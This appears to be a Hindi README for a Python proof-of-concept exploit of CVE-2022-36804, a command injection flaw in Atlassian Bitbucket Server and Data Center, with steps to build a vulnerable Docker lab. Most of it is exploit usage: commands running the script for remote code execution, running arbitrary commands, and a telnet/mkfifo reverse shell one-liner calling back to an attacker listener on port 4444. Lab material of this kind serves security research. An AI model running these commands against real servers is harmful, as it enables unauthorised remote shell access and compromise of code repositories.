
CVE-2022-36804 के लिए Python-आधारित प्रमाण-अवधारणा शोषण, Atlassian Bitbucket Server और Data Center में एक कमांड इंजेक्शन कमजोरी, जो दुर्भावनापूर्ण HTTP अनुरोधों के माध्यम से दूरस्थ कोड निष्पादन को सक्षम बनाती है।
⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए
मूल PoC लेखक Walnut Security Services Pvt. Ltd के प्रति अत्यंत आभारी हैं
Atlassian Bitbucket Server और Data Center 7.0.0 (संस्करण 7.6.17 से पहले), 7.7.0 से 7.17.10 से पहले, 7.18.0 से 7.21.4 से पहले, 8.0.0 से 8.0.3 से पहले, 8.1.0 से 8.1.3 से पहले, 8.2.0 से 8.2.2 से पहले, और 8.3.0 से 8.3.1 से पहले के संस्करणों में कई API एंडपॉइंट, सार्वजनिक या निजी बिटबकेट रिपॉजिटरी पर पढ़ने की अनुमति वाले दूरस्थ हमलावरों को एक दुर्भावनापूर्ण HTTP अनुरोध भेजकर मनमाना कोड निष्पादित करने की अनुमति देते हैं। यह भेद्यता हमारे बग बाउंटी प्रोग्राम के माध्यम से TheGrandPew द्वारा रिपोर्ट की गई थी।
पहले, रिपॉजिटरी को क्लोन करें
git clone https://github.com/asepsaepdin/CVE-2022-36804.git
निर्देशिका बदलें
cd CVE-2022-36804
भेद्य कंटेनर बनाएँ
docker build -t CVE-2022-36804 .
अस्थायी कंटेनर चलाएँ
docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
कंटेनर का आईपी पता जांचें
docker inspect CVE-2022-36804 | grep "IPAddress"
एटलैसियन बिटबकेट सेट अप करें और URL खोलकर नया सार्वजनिक रिपॉजिटरी बनाएँ: http://172.17.0.3:7990
रिमोट कोड एक्ज़ीक्यूशन (RCE) की जाँच करें
python3 cve-2022-36804.py -u http://172.17.0.3:7990
अनुकूलित कमांड (cmd) के साथ RCE की जाँच करें
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
एक हमलावर के दृष्टिकोण से, इंटरैक्टिव शेल तक पहुँच प्राप्त करने के लिए रिमोट कोड निष्पादन महत्वपूर्ण है। इसलिए, निम्नलिखित कमांड को निष्पादित करने से bash पर आधारित tcp पर एक telnet रिवर्स शेल हमलावर के सिस्टम पर पोर्ट 4444/tcp पर ट्रिगर होगा:
python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
nc -nlvp 4444